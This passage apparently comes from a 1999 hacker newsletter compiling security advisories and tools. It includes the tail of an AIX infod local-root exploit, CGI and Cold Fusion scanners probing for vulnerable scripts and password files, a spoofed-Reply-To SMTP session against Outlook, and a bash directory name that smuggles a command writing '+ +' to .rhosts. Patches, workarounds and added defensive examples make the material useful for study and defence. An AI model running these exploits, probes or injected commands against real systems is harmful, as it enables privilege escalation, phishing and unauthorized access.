         send_environ(buffer,param);
         
         sprintf(buffer,"SHELL=%s",getenv("SHELL"));
         send_environ(buffer,param);
         
         sprintf(buffer,"%s","ODMDIR=/etc/objrepos");
         send_environ(buffer,param);
         
         sprintf(buffer,"HOME=%s",HOME);
         send_environ(buffer,param);
         
         sprintf(buffer,"%s","TERM=vt220");
         send_environ(buffer,param);
         
         sprintf(buffer,"%s","MAILMSG=[YOU HAVE NEW MAIL]");
         send_environ(buffer,param);
         
         sprintf(buffer,"PWD=%s",PWD);
         send_environ(buffer,param);
         
         sprintf(buffer,"%s","TZ=NFT-1");
         send_environ(buffer,param);
         
         sprintf(buffer,"%s","A__z=! LOGNAME");
         send_environ(buffer,param);
         
         /* Start info_gr with -q parameter or the process will be run locally and
            not from the daemon ... */
         
         sprintf(buffer,"%c%c%c%c",1,45,113,0);
         fwrite(buffer,1,4,param);
         
         fclose(param);
         
         param=fopen("/tmp/tempo.fun","rb");
         fseek(param,0,SEEK_END);
         taille_param=ftell(param);
         fseek(param,0,SEEK_SET);
         fread(paramz,1,taille_param,param);
         fclose(param);
         
         unlink("/tmp/tempo.fun");
         
         /* Thank you Mr daemon :) */
         
         write(chaussette,paramz,taille_param);
         
         printf("\n%s %s\n",OK,getenv("HOSTNAME"));
         
         close(chaussette);
       }
       
       -------------------------------------------------------------------------
       
       RSI.0011.11-12-98.AIX.INFOD
       
       
       
                  |:::.  |::::: |::::.        |::::: |::::: |::::.
                  ..  :: ..     ..  ::        ..     ..     ..  ::
                  |::::  |::::  |::::  :::::: |::::: |::::  |:
                  |:  :: |:     |:               |:: |:     |:  ::
                  |:  :: |::::: |:            |::::: |::::: |:::::
       
       
                          Repent Security Incorporated, RSI
                              [ http://www.repsec.com ]
       
       
                              *** RSI ALERT ADVISORY ***
       
       
       --- [CREDIT] --------------------------------------------------------------
       
       Andrew Green: Discovered the vulnerability
       Mark Zielinski: Author of the advisory
       
       --- [SUMMARY] -------------------------------------------------------------
       
       Announced:     November 09, 1998
       Report code:   RSI.0011.11-12-98.AIX.INFOD
       Report title:  AIX infod
       
       Vulnerability: Please see the details section
       Vendor status: AIX contacted on November 12, 1998
       Patch status:  IBM is currently working on several fixes
       
       Platforms:     AIX 3.2.x, 4.1.x, 4.2.x, 4.3.x
       
       Reference:     http://www.repsec.com/advisories.html
       Impact:        If exploited, an attacker could potentially compromise
                      root access locally on your server
       
       --- [DETAILS] -------------------------------------------------------------
       
        Description:   The Info Explorer daemon is an AIX utility which is used
                       to provide documentation for the operating system and
                       associated programs.
       
        Problem:       The info daemon does not perform any validation on information
                       passed to the local socket that it is bound to.  Users on the
                       system can send false information to the daemon and trick
                       it into spawning a connection to the intruder's X display.
       
       Details:       By sending a UID and GID of 0, along with a false environment,
                      infod will be forced into spawning a connection with root
                      privileges to the intruder's X display.
       
                       Once the program appears on the screen, they can go to
                       the default options menu and change the printer command
                       line to an alternate binary such as /bin/sh that gives
                       privileges to the account the session was spawned under.
       
       
       --- [FIX] -----------------------------------------------------------------
       
       Solution:      IBM is currently working on the following fixes which will be
                      available soon:
       
                         AIX 3.2.x:  upgrade to version 4
                         AIX 4.1.x:  IX84640
                         AIX 4.2.x:  IX84641
                         AIX 4.3.x:  IX84642
       
                      Until the fixes can be applied, the infod daemon should be disabled.
                      Run the following commands as root:
       
                         # stopsrc -s infod
                         # rmitab infod
                         # chown root.system /usr/lpp/info/bin/infod
                         # chmod 0 /usr/lpp/info/bin/infod
       
       
       ---------------------------------------------------------------------------
       
       Repent Security Incorporated (RSI)
       13610 N. Scottsdale Rd.
       Suite #10-326
       Scottsdale, AZ 85254
       
       E-Mail: advise@repsec.com
       FTP: ftp://ftp.repsec.com
       WWW: http://www.repsec.com
       
       ---------------------------------------------------------------------------
       
       -----BEGIN PGP PUBLIC KEY BLOCK-----
       Version: 2.6.2
       
       mQCNAzU6dqAAAAEEAOHt9a5vevjD8ZjsEmncEbFp2U7aeqvPTcF/8FJMilgOVp75
       dshXvZixHsYU7flgCNzA7wLIQPWBQBrweLG6dx9gE9e5Ca6yAJxZg8wNsi06tZfP
       nvmvf6F/7xoWS5Ei4k3YKuzscxlyePNNKws6uUe2ZmwVoB+i3HHT44dOafMhAAUT
       tBpSZXBTZWMgPGFkdmlzZUByZXBzZWMuY29tPg==
       =ro8H
       -----END PGP PUBLIC KEY BLOCK-----
       
       Copyright November 1998 RepSec, Inc.
       
        The information in this document is provided as a service to customers
        of RepSec, Inc.  Neither RepSec, Inc., nor any of its employees, makes
        any warranty, express or implied, or assumes any legal liability or
        responsibility for the accuracy, completeness, or usefulness of any
        information, apparatus, product, or process contained herein, or
        represents that its use would not infringe any privately owned rights.
        Reference herein to any specific commercial products, process, or
        services by trade name, trademark, manufacturer, or otherwise, does not
        necessarily constitute or imply its endorsement, recommendation or
        favoring by RepSec, Inc.  The views and opinions of authors expressed
        herein do not necessarily state or reflect those of RepSec, Inc., and may
        not be used for advertising or product endorsement purposes.
       
       The material in this alert advisory may be reproduced and distributed,
       without permission, in whole or in part, by other security incident
       response teams (both commercial and non-commercial), provided the above
       copyright is kept intact and due credit is given to RepSec, Inc.
       
       This alert advisory may be reproduced and distributed, without
       permission, in its entirety only, by any person provided such
       reproduction and/or distribution is performed for non-commercial
       purposes and with the intent of increasing the awareness of the Internet
       community.
       
       ---------------------------------------------------------------------------
       
       RepSec, Inc. are trademarks of RepSec, Inc.  All other trademarks are
       property of their respective holders.
       
       
       @HWA      
       
 28.0  Cold Fusion vulnerability scanner
       ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
       
       /*
       COLD FUSION VULNERABILITY TESTER - Checks for the l0pht advisory
       "Cold Fusion Application Server Advisory" dated 4.20.1999
       you can find a copy of this advisory and all other
       l0pht Security Advisories here:
       http://www.l0pht.com/advisories.html
         
        much of this program was blatantly copied from the cgi scanner released about
        a week ago, written by su1d sh3ll...  I just want to give credit where credit
        is due...  this particular scanner was "written" (basically modified) by
        hypoclear of lUSt - Linux Users Strike Today...  I know that it is trivial to
        check to see if a server is vulnerable, but I had fun doing this so who the
        heck cares if I want to waste my time...
       
       while I'm here I minds well give shout outs to:
       Phrozen Phreak (fidonet rules)
       Special K (you will never get rid of my start button ;-)
                       go powerpuff girls (he he) ;-)
       
       compile:   gcc -o coldscan coldscan.c
       usage:     coldscan host
       tested on: IRIX Release 5.3 (this should compile on most *NIX systems though)
       */
       
       
       #include <fcntl.h>
       #include <sys/types.h>
       #include <sys/socket.h>
       #include <netinet/in.h>
       #include <signal.h>
       #include <stdio.h>
       #include <string.h>
       #include <netdb.h>
       #include <ctype.h>
       #include <arpa/nameser.h>
       #include <sys/stat.h>
       #include <strings.h>
       #include <stdio.h>
       #include <stdlib.h>
       #include <unistd.h>
       #include <sys/socket.h>
       
       void main(int argc, char *argv[])
       {
        int sock,debugm=0;
        struct in_addr addr;
        struct sockaddr_in sin;
        struct hostent *he;
        unsigned long start;
        unsigned long end;
        unsigned long counter;
        char foundmsg[] = "200";
        char *cgistr;
        char buffer[1024];
        int count=0;
        int numin;
        char cfbuff[1024];
        char *cfpage[5];
        char *cfname[5];
       
       
        cfpage[1] = "GET /cfdocs/expeval/openfile.cfm HTTP/1.0\n\n";
        cfpage[2] = "GET /cfdocs/expeval/displayopenedfile.cfm HTTP/1.0\n\n";
        cfpage[3] = "GET /cfdocs/expeval/exprcalc.cfm HTTP/1.0\n\n";
        
       
        cfname[1] = "openfile.cfm           ";
        cfname[2] = "displayopenedfile.cfm  ";
        cfname[3] = "exprcalc.cfm           ";
       
       
        if (argc<2)
          {
          printf("\n-=COLD FUSION VULNERABILITY TESTER=-");
          printf("\nusage - %s host \n",argv[0]);
          exit(0);
          }
       
        if ((he=gethostbyname(argv[1])) == NULL)
          {
          herror("gethostbyname");
          exit(0);
          }
       
        printf("\n-=COLD FUSION VULNERABILITY TESTER=-\n");
        printf("scanning...\n\n");
        start=inet_addr(argv[1]);
        counter=ntohl(start);
       
          sock=socket(AF_INET, SOCK_STREAM, 0);
          bcopy(he->h_addr, (char *)&sin.sin_addr, he->h_length);
          sin.sin_family=AF_INET;
          sin.sin_port=htons(80);
       
         if (connect(sock, (struct sockaddr*)&sin, sizeof(sin))!=0)
            {
            perror("connect");
            }
       
       
       while(count++ < 3)
          {
          sock=socket(AF_INET, SOCK_STREAM, 0);
          bcopy(he->h_addr, (char *)&sin.sin_addr, he->h_length);
          sin.sin_family=AF_INET;
          sin.sin_port=htons(80);
          if (connect(sock, (struct sockaddr*)&sin, sizeof(sin))!=0)
            {
            perror("connect");
            }
          printf("Searching for %s : ",cfname[count]);
       
          for(numin=0;numin < 1024;numin++)
             {
             cfbuff[numin] = '\0';
             }
        
          send(sock, cfpage[count],strlen(cfpage[count]),0);
          recv(sock, cfbuff, sizeof(cfbuff),0);
          cgistr = strstr(cfbuff,foundmsg);
          if( cgistr != NULL)
              printf("Exists!\n");
          else
              printf("Not Found\n");
             
            close(sock);
          }
        }
       
       @HWA       
                                               
                                               
 29.0  Updated CGI scanner scans for vulnerable servers
       ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
       
        /* Cgi Scan v3.0 - scans web servers for vulnerable CGIs   */
        
        /* Based on Ech0's cgi scanner - i thought it was crap :(  */
        /* Modified and re-written by v0rt-fu (### - undernet)     */
        
        /* Most of these can be exploited via www.anonymiser.com   */
        /* phf isn't allowed - others haven't been tested but      */
        /* should work.                                            */
        
        /* Considering this scans a server for 43 vulnerabilities  */
        /* only those exploits found are shown so you can track    */
        /* what is actually happening                              */
       
       /* Thanks to b|ueberry for helping me pull through the     */
       /* the hard times and made me continue to code :)          */
       
       /* v0rt-fu                                                 */
       
        #include <stdio.h>
        #include <stdlib.h>
        #include <string.h>
        #include <strings.h>
        #include <unistd.h>
        #include <sys/types.h>
        #include <sys/socket.h>
        #include <netinet/in.h>
        #include <arpa/inet.h>
        #include <netdb.h>
        
        int main(int argc, char *argv[])
        {
         int sock,debugm=0;
         struct sockaddr_in sin;
         struct hostent *he;
         unsigned long start;
         unsigned long counter;
         /* match the status line ("HTTP/1.0 200 OK"), not any "200" that
            happens to appear in a header or in the body of an error page */
         char foundmsg[] = " 200 ";
         char *cgistr;
         char buffer[1024];
         int count=0;
         int numin;
         char cgibuff[1024];
         char *buff[50];     /* request line sent for each probe */
         char *cginame[50];  /* name printed for each probe      */
        buff[1] = "GET /cgi-bin/unlg1.1 HTTP/1.0\n\n";
        buff[2] = "GET /cgi-bin/phf HTTP/1.0\n\n";
        buff[3] = "GET /cgi-bin/Count.cgi HTTP/1.0\n\n";
        buff[4] = "GET /cgi-bin/test-cgi HTTP/1.0\n\n";
        buff[5] = "GET /cgi-bin/nph-test-cgi HTTP/1.0\n\n";
        buff[6] = "GET /cgi-bin/php.cgi HTTP/1.0\n\n";
        buff[7] = "GET /cgi-bin/handler HTTP/1.0\n\n";
        buff[8] = "GET /cgi-bin/webgais HTTP/1.0\n\n";
        buff[9] = "GET /cgi-bin/websendmail HTTP/1.0\n\n";
        buff[10] = "GET /cgi-bin/webdist.cgi HTTP/1.0\n\n";
        buff[11] = "GET /cgi-bin/faxsurvey HTTP/1.0\n\n";
        buff[12] = "GET /cgi-bin/htmlscript HTTP/1.0\n\n";
        buff[13] = "GET /cgi-bin/pfdispaly.cgi HTTP/1.0\n\n";
        buff[14] = "GET /cgi-bin/perl.exe HTTP/1.0\n\n";
        buff[15] = "GET /cgi-bin/wwwboard.pl HTTP/1.0\n\n";
        buff[16] = "GET /cgi-bin/www-sql HTTP/1.0\n\n";
        buff[17] = "GET /cgi-bin/view-source HTTP/1.0\n\n";
        buff[18] = "GET /cgi-bin/campas HTTP/1.0\n\n";
        buff[19] = "GET /cgi-bin/aglimpse HTTP/1.0\n\n";
        buff[20] = "GET /cgi-bin/man.sh HTTP/1.0\n\n";
        buff[21] = "GET /cgi-bin/AT-admin.cgi HTTP/1.0\n\n";
        buff[22] = "GET /cgi-bin/filemail.pl HTTP/1.0\n\n";
        buff[23] = "GET /cgi-bin/maillist.pl HTTP/1.0\n\n";
        buff[24] = "GET /cgi-bin/jj HTTP/1.0\n\n";
        buff[25] = "GET /cgi-bin/info2www HTTP/1.0\n\n";
        buff[26] = "GET /cgi-bin/files.pl HTTP/1.0\n\n"; 
        buff[27] = "GET /cgi-bin/finger HTTP/1.0\n\n";
        buff[28] = "GET /cgi-bin/bnbform.cgi HTTP/1.0\n\n";
        buff[29] = "GET /cgi-bin/survey.cgi HTTP/1.0\n\n";
        buff[30] = "GET /cgi-bin/AnyForm2 HTTP/1.0\n\n";
        buff[31] = "GET /cgi-bin/textcounter.pl HTTP/1.0\n\n";
        buff[32] = "GET /cgi-bin/classifieds.cgi HTTP/1.0\n\n";
        buff[33] = "GET /cgi-bin/environ.cgi HTTP/1.0\n\n";
        buff[34] = "GET /_vti_pvt/service.pwd HTTP/1.0\n\n";
        buff[35] = "GET /_vti_pvt/users.pwd HTTP/1.0\n\n";
        buff[36] = "GET /_vti_pvt/authors.pwd HTTP/1.0\n\n";
        buff[37] = "GET /_vti_pvt/administrators.pwd HTTP/1.0\n\n";
        buff[38] = "GET /cgi-dos/args.bat HTTP/1.0\n\n";
        buff[39] = "GET /cgi-win/uploader.exe HTTP/1.0\n\n";
        buff[40] = "GET /search97.vts HTTP/1.0\n\n";
        buff[41] = "GET /carbo.dll HTTP/1.0\n\n";
        buff[42] = "GET /cgi-bin/fpexplore.exe HTTP/1.0\n\n";
        buff[43] = "GET /cfdocs/expeval/openfile.cfm HTTP/1.0\n\n";
       
        cginame[1] = "UnlG               ";
        cginame[2] = "phf                ";
        cginame[3] = "Count.cgi          "; 
        cginame[4] = "test-cgi           ";
        cginame[5] = "nph-test-cgi       ";
        cginame[6] = "php.cgi            ";
        cginame[7] = "handler            ";
        cginame[8] = "webgais            ";
        cginame[9] = "websendmail        ";
        cginame[10] = "webdist.cgi        ";
        cginame[11] = "faxsurvey          ";
        cginame[12] = "htmlscript         ";
        cginame[13] = "pfdisplay          ";
        cginame[14] = "perl.exe           ";
        cginame[15] = "wwwboard.pl        ";
        cginame[16] = "www-sql            ";
        cginame[17] = "view-source        ";
        cginame[18] = "campas             ";
        cginame[19] = "aglimpse           ";
        cginame[20] = "man.sh             ";
        cginame[21] = "AT-admin.cgi       ";
        cginame[22] = "filemail.pl        ";
        cginame[23] = "maillist.pl        ";
        cginame[24] = "jj                 ";
        cginame[25] = "info2www           ";
        cginame[26] = "files.pl           ";
        cginame[27] = "finger             ";
        cginame[28] = "bnbform.cgi        ";
        cginame[29] = "survey.cgi         ";
        cginame[30] = "AnyForm2           ";
        cginame[31] = "textcounter.pl     ";
        cginame[32] = "classifields.cgi   ";
        cginame[33] = "environ.cgi        ";
        cginame[34] = "service.pwd        ";
        cginame[35] = "users.pwd          ";
        cginame[36] = "authors.pwd        ";
        cginame[37] = "administrators.pwd ";
        cginame[38] = "args.bat           ";
        cginame[39] = "uploader.exe       ";
        cginame[40] = "search97.vts       ";
        cginame[41] = "carbo.dll          ";
        cginame[42] = "fpexplore.exe      ";
        cginame[43] = "openfile.cfm       ";
       
         if (argc<2)
           {
           printf("\n _   _  __   ___  _   _    _   _  __   ___  _   _    _   _  __   ___  _   _ ");
           printf("\n( )_( )/. | / __)( )_( )  ( )_( )/. | / __)( )_( )  ( )_( )/. | / __)( )_( )");
           printf("\n ) _ ((_  _)`__ ` ) _ (    ) _ ((_  _)`__ ` ) _ (    ) _ ((_  _)`__ ` ) _ ( ");
           printf("\n(_) (_) (_) (___/(_) (_)  (_) (_) (_) (___/(_) (_)  (_) (_) (_) (___/(_) (_)");
           printf("\n                                                                    Presents");
           printf("\n                               [ Cgi Scanner ]");
           printf("\n                                    v3.0");
           printf("\n                             ### - undernet.org ");
           printf("\n");
           printf("\nUsage: ./cgi www.server.com [-d]\n");
           printf("\n");
           exit(0);
           }
        
         /* optional -d flag: dump every raw response (strstr("-d",argv[2])
            had its arguments reversed and never matched) */
         if (argc>2 && strcmp(argv[2],"-d")==0)
           {
           debugm=1;
           }
        
         if ((he=gethostbyname(argv[1])) == NULL)
           {
           herror("gethostbyname");
           exit(1);
           }
        
           printf("\n _   _  __   ___  _   _    _   _  __   ___  _   _    _   _  __   ___  _   _ ");
           printf("\n( )_( )/. | / __)( )_( )  ( )_( )/. | / __)( )_( )  ( )_( )/. | / __)( )_( )");
           printf("\n ) _ ((_  _)`__ ` ) _ (    ) _ ((_  _)`__ ` ) _ (    ) _ ((_  _)`__ ` ) _ ( ");
           printf("\n(_) (_) (_) (___/(_) (_)  (_) (_) (_) (___/(_) (_)  (_) (_) (_) (___/(_) (_)");
           printf("\n                                                                    Presents");
           printf("\n                               [ Cgi Scanner ]");
           printf("\n                                    v3.0");
           printf("\n                             ### - undernet.org ");
           printf("\n");
           printf("\nCgi Scan v3.0");
           printf("\n\nPress any key to continue\n\n");
           getchar();
        
           /* first connection: grab the server banner with a HEAD request */
           sock=socket(AF_INET, SOCK_STREAM, 0);
           bcopy(he->h_addr, (char *)&sin.sin_addr, he->h_length);
           sin.sin_family=AF_INET;
           sin.sin_port=htons(80);
           if (connect(sock, (struct sockaddr*)&sin, sizeof(sin))!=0)
             {
             perror("connect");
             exit(1);
             }
           printf("\nReceiving Httpd Version\n\n");
           memset(buffer, 0, sizeof(buffer));          /* keeps the reply NUL-terminated */
           send(sock, "HEAD / HTTP/1.0\r\n\r\n", strlen("HEAD / HTTP/1.0\r\n\r\n"), 0);
           recv(sock, buffer, sizeof(buffer)-1, 0);
           printf("%s",buffer);
           close(sock); 
           printf("\n\nReceiving Cgi Details\n\n"); 
           while(count++ < 43) 
           {
              /* one HTTP/1.0 connection per probe */
              sock=socket(AF_INET, SOCK_STREAM, 0);
              bcopy(he->h_addr, (char *)&sin.sin_addr, he->h_length);
              sin.sin_family=AF_INET;
              sin.sin_port=htons(80);
              if (connect(sock, (struct sockaddr*)&sin, sizeof(sin))!=0)
                {
                   perror("connect");
                   close(sock);
                   continue;       /* skip this probe instead of reading a dead socket */
                }
              memset(cgibuff, 0, sizeof(cgibuff));
              send(sock, buff[count],strlen(buff[count]),0);
              recv(sock, cgibuff, sizeof(cgibuff)-1,0);
              close(sock);         /* was never closed: 43 leaked descriptors per run */
        
              if (debugm)
                 printf("--- %s\n%s\n", cginame[count], cgibuff);
        
              /* a hit is an HTTP reply whose status line carries the marker;
                 404, 403 and 302 answers are not reported */
              cgistr = strstr(cgibuff,foundmsg);
              if( cgistr != NULL && strncmp(cgibuff, "HTTP/", 5) == 0) {
                  printf("%s :",cginame[count]);
                  printf(" Found\n");
              }
        
           }
           printf("\nScan Complete\n\n");
           printf("\nv0rt-fu   -- ### undernet.org\n\n");
           exit(0);
         }
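        The scanner above decides "Found" by looking for the substring "200"
        anywhere in the first kilobyte of the reply, so a 404 page that carries
        "Content-Length: 200" (or a year, or a port number) is reported as a
        hit. The following is an added example, not part of v0rt-fu's scanner
        and written in Python rather than C, of the check the scanner needs:
        parse the status line and only count a real 200. The sample responses
        are constructed, the probe paths are a few of the ones in the table
        above, and probe() is ordinary network code that is not exercised
        offline; www.example.com is a placeholder host.

```python
"""Classify HTTP probe responses the way a CGI scanner should.

Added example (not the scanner's own code).  The sample responses below are
constructed, not captured from any server.
"""
import socket
from typing import Optional

# Constructed sample responses.
RESP_200 = (b"HTTP/1.0 200 OK\r\nServer: Apache/1.3.6\r\n"
            b"Content-Type: text/html\r\n\r\n<html>phf</html>")
RESP_404_WITH_200 = (b"HTTP/1.1 404 Not Found\r\nServer: Apache/1.3.6\r\n"
                     b"Content-Length: 200\r\n\r\n<html>Not Found</html>")
RESP_302 = b"HTTP/1.0 302 Found\r\nLocation: http://www.example.com/login\r\n\r\n"
RESP_JUNK = b"220 ftp.example.com FTP server ready\r\n"


def naive_match(raw: bytes) -> bool:
    """The scanner's original test: is the substring "200" anywhere in the reply?"""
    return b"200" in raw


def status_code(raw: bytes) -> Optional[int]:
    """Return the status code from the HTTP status line, or None if it is not HTTP."""
    line = raw.split(b"\r\n", 1)[0].split(b"\n", 1)[0]   # old servers may answer with bare LF
    parts = line.split()
    if len(parts) < 2 or not parts[0].startswith(b"HTTP/"):
        return None
    try:
        return int(parts[1])
    except ValueError:
        return None


def is_present(raw: bytes) -> bool:
    """A probe counts as present only when the status line itself says 200."""
    return status_code(raw) == 200


def build_request(host: str, path: str, method: str = "GET") -> bytes:
    """A well-formed HTTP/1.0 request: CRLF line endings and a Host header,
    which a name-based virtual host needs in order to route the request."""
    return f"{method} {path} HTTP/1.0\r\nHost: {host}\r\n\r\n".encode("ascii")


def probe(host: str, path: str, port: int = 80, timeout: float = 5.0) -> Optional[int]:
    """Send one probe and return its status code (None on connect or parse failure).
    Network code; not run in the offline checks."""
    try:
        with socket.create_connection((host, port), timeout=timeout) as s:
            s.sendall(build_request(host, path))
            chunks = []
            while sum(len(c) for c in chunks) < 4096:
                data = s.recv(1024)
                if not data:
                    break
                chunks.append(data)
        return status_code(b"".join(chunks))
    except OSError:
        return None


if __name__ == "__main__":
    import sys
    # A few of the paths from the scanner's table above.
    paths = ["/cgi-bin/phf", "/cgi-bin/test-cgi", "/cgi-bin/nph-test-cgi",
             "/_vti_pvt/service.pwd", "/cfdocs/expeval/openfile.cfm"]
    if len(sys.argv) < 2:
        print("usage: cgiprobe.py host")
    else:
        for p in paths:
            print(f"{p:35s} {probe(sys.argv[1], p)}")
```

        Even a genuine 200 is not proof: servers that answer every unknown
        path with a friendly 200 page need a second probe for a path that
        certainly does not exist, so the two replies can be compared.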
       
       
       @HWA
 
 30.0  MS Outlook, spoof yer reply-to address?
       ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
       
       Date: Tue, 20 Apr 1999 15:10:05 -0700
       From: Nate Lawson <nate@root.org>
       To: BUGTRAQ@netspace.org
       Subject: Outlook 98 allows spoofing internal users
       
       Problem: Outlook uses a sender's Reply-To address silently, allowing
                a user to inadvertently send data to an Internet mail account
                when intending to reply to an internal, trusted user.
       
       Impact: Anyone on the Internet can spoof a trusted internal Exchange user
                and get replies sent back to themselves without the user knowing they
               weren't responding to another internal user.
       
       How to reproduce:
       
       1.  Spoof mail as an internal user with a Reply-To address claiming to be
           an internal user, but an address of an Internet account, say hotmail.
       2.  Go into Outlook and read the mail.  The mail looks like it was internally
           generated but viewing the full Internet headers under View->Options
           shows the bogus Reply-To header.
       3.  Hit Reply in Outlook.  The To: field looks like it's going to a valid
           internal user, but right clicking on it and choosing Properties shows
           that the internal user it is sending the reply to is actually an Internet
           address.
       4.  Enter some text and hit Send.  Observe that the mail went to the attacker's
           account, not the internal one.
       
       A quick script:
       
       {root 5:00pm} ~> telnet mail.example.com 25
       Trying 10.20.2.5...
       Connected to mail.example.com.
       Escape character is '^]'.
       220 mail.example.com ESMTP Server (Microsoft Exchange Internet Mail Service 5.5.2448.0) ready
       helo losebag
       250 OK
       mail from:<>
       250 OK - mail from <>
       rcpt to:<accounting@example.com>
       250 OK - Recipient <accounting@example.com>
       data
       354 Send data.  End with CRLF.CRLF
        From: Nate Lawson
       To: Accounting
       Reply To: Nate Lawson<intruder@hotmail.com>
       Subject: important!
       
       Please reply with the latest copy of our sales figures!
       
       Thanks,
       Nate
       .
       250 OK
       quit
       221 closing connection
       Connection closed by foreign host.
       
       Now, a reply to the email will go not to the trusted internal user Nate
       Lawson <nlawson@example.com> but to the attacker, <intruder@hotmail.com>.
       Worse, the user sees no indication that the mail is outward-bound!  The
       To: field on the reply simply shows "Nate Lawson", a valid internal user.
       
       Affected programs:  Only tested on Outlook 98
       
       Known use of this bug to get confidential information:  none yet
       
       Suggested Fix: always show the full email address of any recipient that is
       not local (i.e. username@example.com would be hidden but any instance of
       user@hotmail.com would be shown)
       
       Microsoft has been notified, but claimed this was a weakness in SMTP and
       would not be fixed until a secure successor to SMTP is implemented. They
        obviously missed the point -- the error is not in that mail can be forged,
       but that Outlook allows a user to respond to a message that looks local
       and legitimate, but is actually destined for an outside address.
       
       -Nate
       
       -----------------------------------------------------------------------
       
       Date: Sun, 25 Apr 1999 18:36:11 +0200
       From: Peter van Dijk <peter@ATTIC.VUURWERK.NL>
       To: BUGTRAQ@netspace.org
       Subject: Re: Outlook 98 allows spoofing internal users
       
       On Tue, Apr 20, 1999 at 03:10:05PM -0700, Nate Lawson wrote:
       >
       > Suggested Fix: always show the full email address of any recipient that is
       > not local (i.e. username@example.com would be hidden but any instance of
       > user@hotmail.com would be shown)
       
       Yeah, like: I am user@aol.com and I'd like outlook to hide evilhacker@aol.com.
       
       Outlook should not be hiding anything..
       
       Greetz, Peter
       --
       | 'He broke my heart,    |                              Peter van Dijk |
            I broke his neck'   |                     peter@attic.vuurwerk.nl |
          nognixz - As the sun  |        Hardbeat@ircnet - #cistron/#linux.nl |
                                | Hardbeat@undernet - #groningen/#kinkfm/#vdh |
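        The client-side check Nate Lawson asks for, as an added example that is
        not part of either post and not Outlook's code. It reports the address
        a reply would really go to and flags it both when Reply-To names a
        different mailbox than From and when that mailbox is outside the local
        domains, since, as the follow-up points out, an attacker may sit on the
        same domain as the victim. The two messages are constructed: the
        spoofed one mirrors the SMTP session above with a From address added so
        the comparison has something to compare; the local-domain set
        {"example.com"} is an assumption.

```python
"""Flag replies that would leave the organisation because of a Reply-To header.

Added example, not code from the posts or from any mail client.
"""
from email import message_from_string
from email.message import Message
from email.utils import parseaddr
from typing import Optional, Set, Tuple

# Constructed messages (not captured traffic).
SPOOFED = """From: Nate Lawson <nlawson@example.com>
To: Accounting <accounting@example.com>
Reply-To: Nate Lawson <intruder@hotmail.com>
Subject: important!

Please reply with the latest copy of our sales figures!
"""

LEGIT = """From: Nate Lawson <nlawson@example.com>
To: Accounting <accounting@example.com>
Subject: lunch?

Sandwiches at noon?
"""


def load(raw: str) -> Message:
    """Parse a raw RFC 822 message."""
    return message_from_string(raw)


def reply_address(msg: Message) -> Tuple[str, str]:
    """(display name, address) a reply is sent to: Reply-To if present, else From."""
    header = msg.get("Reply-To") or msg.get("From") or ""
    name, addr = parseaddr(header)
    return name, addr.lower()


def domain_of(addr: str) -> str:
    return addr.rsplit("@", 1)[-1].lower() if "@" in addr else ""


def reply_mismatch(msg: Message) -> bool:
    """True when Reply-To names a different mailbox than From."""
    _, from_addr = parseaddr(msg.get("From") or "")
    _, reply_addr = reply_address(msg)
    return bool(msg.get("Reply-To")) and reply_addr != from_addr.lower()


def external_reply(msg: Message, local_domains: Set[str]) -> Optional[str]:
    """The outside address a reply would go to, or None if it stays local."""
    _, addr = reply_address(msg)
    local = {d.lower() for d in local_domains}
    return addr if domain_of(addr) not in local else None


def reply_banner(msg: Message, local_domains: Set[str]) -> str:
    """What a client should show in the To: field: never the display name alone."""
    name, addr = reply_address(msg)
    flags = []
    if reply_mismatch(msg):
        flags.append("Reply-To differs from From")
    if external_reply(msg, local_domains):
        flags.append("EXTERNAL")
    label = f"{name} <{addr}>" if name else addr
    return f"{label} [{'; '.join(flags)}]" if flags else label


if __name__ == "__main__":
    for raw in (SPOOFED, LEGIT):
        print(reply_banner(load(raw), {"example.com"}))
```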
       
       
       @HWA
       
 31.0  Bash parsing vulnerability
       ~~~~~~~~~~~~~~~~~~~~~~~~~~
       
       Date: Tue, 20 Apr 1999 21:25:47 -0400
       From: Shadow <shadow@OPERATOR.ORG>
       To: BUGTRAQ@netspace.org
       Subject: Bash Bug
       
        Figured while everyone was working with bash, I might as well make this
        one public (I apologize if this is old news; apparently it hasn't been fixed
        if so).
       
       If a user creates a directory with a command like
       
       mkdir "\ `echo -e \ "echo + +> ~\57.rhosts\ " > x; source x; rm -f \x\ ` "
       
       and someone cd's into said directory, either by accident, or whatever,
       then it will cause it to actually execute. I also did this with a passwd
       file, echo a user such as r00t::0:0:\57root\57bin\57bash instead of + + to
       the rhosts. Played with symlinks and a few other ways to see if perhaps
       maybe the system could trip it if a user made the directory in say /tmp.
       Granted it may be a long shot on the users part, the ability to do so is a
        bad thing IMHO. This didn't seem to work on any of my BSD boxes.
       
       shadow - CLE
       
       -------------------------------------------------------------------------
       Most Failure is due to giving up, not realizing how close to success you
       were - Thomas Edison
       -------------------------------------------------------------------------
       
       ----------------------------------------------------------------------------
       
       Date: Thu, 22 Apr 1999 13:10:52 +0200
       From: Henrik Nordstrom <hno@HEM.PASSAGEN.SE>
       To: BUGTRAQ@netspace.org
       Subject: Re: Bash Bug
       
       Shadow wrote:
       
       > mkdir "\ `echo -e \ "echo + +> ~\57.rhosts\ " > x; source x; rm -f \x\ ` "
       >
       > and someone cd's into said directory, either by accident, or whatever,
       > then it will cause it to actually execute.
       
       It is a vulnerability of the prompt parsing, or more specifically the \w
       or \W prompt escapes for showing the current directory. These get parsed
       before backquote parsing of the prompt string.
       
       Workaround: Make sure the variable PS1 is set to something not including
       the above escapes when cd'ing into directories with backquotes or $ as
       part of their name.
       
       Patch for bash-1.14.7 attached.
       
       bug-bash@prep.ai.mit.edu has been notified.
       
       --
       Henrik Nordstrom
       
           [ Part 2: "Attached Text" ]
       
       --- parse.y.orig        Thu Apr 22 11:53:01 1999
       +++ parse.y     Thu Apr 22 12:56:34 1999
       @@ -2729,6 +2729,17 @@
        #else
                       getwd (t_string);
        #endif /* EFFICIENT */
       +               if (strcspn(t_string, slashify_in_quotes) < strlen(t_string)) {
       +                   char t_string2[MAXPATHLEN];
       +                   int i, j;
       +                   for (i = 0, j = 0 ; t_string[i] && j < MAXPATHLEN - 2 ; i++) {
       +                       if (member(t_string[i], slashify_in_quotes))
       +                           t_string2[j++] = '\\';
       +                       t_string2[j++] = t_string[i];
       +                   }
       +                   t_string2[j] = '\0';
       +                   strcpy(t_string, t_string2);
       +               }
       
                       if (c == 'W')
                         {
